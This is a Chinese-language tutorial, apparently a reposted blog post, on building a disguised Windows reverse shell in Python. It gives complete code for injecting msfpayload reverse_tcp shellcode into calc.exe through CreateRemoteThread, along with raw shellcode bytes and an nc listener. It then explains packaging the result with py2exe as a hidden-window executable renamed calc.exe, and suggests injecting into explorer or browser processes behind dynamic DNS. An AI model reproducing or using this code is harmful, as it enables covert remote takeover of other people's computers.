在python平台进行dll远程线程注入,实现一个简单的反弹shell;方法来自互联网!
准备工作:
安装有python的平台,最好是windows(顺便进行测试);安装有py2exe,以便于把python脚本转化为.exe文件。
ok,准备好了就让我们开始:
首先用msfpyload生成一段shellcode:
msfpayload windows/shell_reverse_tcp LHOST=your lhost LPORT=your port C
然后新建三个python脚本:inj.py,defines.py 和 setup.py , 内容分别如下:
[ 将上如图中标记出来的的反弹shell代码替换inj.py中“shell_reverse_tcp_shellcode=(”后面的相应内容;这个脚本中“victim = r"C:\windows\system32\calc.exe"” 是将我们生成的shellcode注入到calc.exe文件,也就是windows自带的计算器程序进程里,可以自己修改,如资源管理器,ie什么的]
inj.py:
import sys
from ctypes import *
from defines import *
kernel32 = windll.kernel32
PAGE_EXECUTE_READWRITE = 0x00000040
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
VIRTUAL_MEM = (0x1000 | 0x2000)
victim = r"C:\windows\system32\calc.exe"
startupinfo =STARTUPINFO()
process_information =PROCESS_INFORMATION()
creation_flags =CREATE_NEW_CONSOLE
startupinfo.dwFlags =0x1
startupinfo.wShowWindow =0x0
startupinfo.cb =sizeof(startupinfo)
kernel32.CreateProcessA(victim,
None,
None,
None,
None,
creation_flags,
None,
None,
byref(startupinfo),
byref(process_information))
pid = process_information.dwProcessId
def inject(pid,data,parameter=0):
h_process = kernel32.OpenProcess(PROCESS_ALL_ACCESS,False,int(pid))
if not h_process:
raise SystemExit,"[!] Could not acquire a handle to PID : %s"%pid
arg_address=kernel32.VirtualAllocEx(h_process,
0,
len(data),
VIRTUAL_MEM,
PAGE_EXECUTE_READWRITE)
written = c_int(0)
kernel32.WriteProcessMemory(h_process,
arg_address,
data,
len(data),
byref(written))
thread_id = c_ulong(0)
start_address = arg_address
if not kernel32.CreateRemoteThread(h_process,
None,
0,
start_address,
parameter,
0,
byref(thread_id)):
raise SystemExit,"[!] Fail to inject Dll . Exit .. "
return True
#msfpayload windows/shell_reverse_tcp LHOST=x LPORT=y
shell_reverse_tcp_shellcode=(
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x68\xc0\xa8\x01\x0b\x68\x02\x00\xad\x9c\x89\xe6\x6a\x10\x56"
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
)
inject(pid,shell_reverse_tcp_shellcode)
currentpid = str(kernel32.GetCurrentProcessId())
#./msfpayload windows/exec CMD="cmd.exe /c taskkill /PID AAAA"
shellcode_kill_proc = \
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" \
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" \
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" \
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" \
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" \
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" \
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" \
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" \
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" \
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" \
"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" \
"\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95" \
"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" \
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e\x65" \
"\x78\x65\x20\x2f\x63\x20\x74\x61\x73\x6b\x6b\x69\x6c\x6c" \
"\x20\x2f\x50\x49\x44\x20\x41\x41\x41\x41\x00"
padding = 4-(len(currentpid))
replace_value = currentpid + ("\x00" * padding)
replace_string = "\x41"*4
shellcode_kill_proc = shellcode_kill_proc.replace(replace_string,
replace_value)
defines.py:
from ctypes import *
# map the Microsoft types
BYTE = c_ubyte
WORD = c_ushort
DWORD = c_ulong
LPBYTE = POINTER(c_ubyte)
LPTSTR = POINTER(c_char)
HANDLE = c_void_p
PVOID = c_void_p
LPVOID = c_void_p
UINT_PTR = c_ulong
SIZE_T = c_ulong
class STARTUPINFO(Structure):
_fields_=[
("cb", DWORD),
("lpReserved", LPTSTR),
("lpDesktop", LPTSTR),
("lpTitle", LPTSTR),
("dwX", DWORD),
("dwY", DWORD),
("dwXSize", DWORD),
("dwYSize", DWORD),
("dwXcountChars", DWORD),
("dwYcountChars", DWORD),
("dwFillAttribute", DWORD),
("dwFlags", DWORD),
("wShowWindow", WORD),
("cbReserved2", WORD),
("lbReserved2", LPBYTE),
("hStdInput", HANDLE),
("hStdOutput", HANDLE),
("hStdError", HANDLE),
]
class PROCESS_INFORMATION(Structure):
_fields_=[
("hProcess", HANDLE),
("hThread", HANDLE),
("dwProcessId", DWORD),
("dwThreadId", DWORD),
]
CREATE_NEW_CONSOLE = 0x00000010
setup.py:
from distutils.core import setup
import py2exe
setup(windows=["inj.pyw"],
options={"py2exe":{"bundle_files":1}},
zipfile=None,
)
在本机用nc进行监控:
nc -lvp your port
将以上三个脚本copy至目标主机同一目录,然后执行:
python inj.py
测试是否shell反弹成功:
若不成功,慢慢检查吧,如果反弹成功,继续:将 inj.py 修改为 inj.pyw ,然后执行setup.py:
python setup.py py2exe
此时你就会在相同目录下发现一个dist文件夹,里面有一个inj.exe就是我们最终想要的东东,然后重命名inj.exe为calc.exe,测试calc.exe是否会成功反弹:
上图反弹成功!试想一下:如果我们将这段反弹shellcode注入资源管理器或者浏览器这种常用且重要的进程里,然后在本机进行端口映射,本机的外网ip地址进行动态域名解析,在上面的shellcode中使用这个域名,再然后用msfconsole监听反弹。。。。
视频教程:
参考:https://www.linux520.com/bcyy/2011-01-08/73.html#ecms
https://hi.baidu.com/fandango/item/e09d55e8197a72e4fb42ba41
来源:xiao106347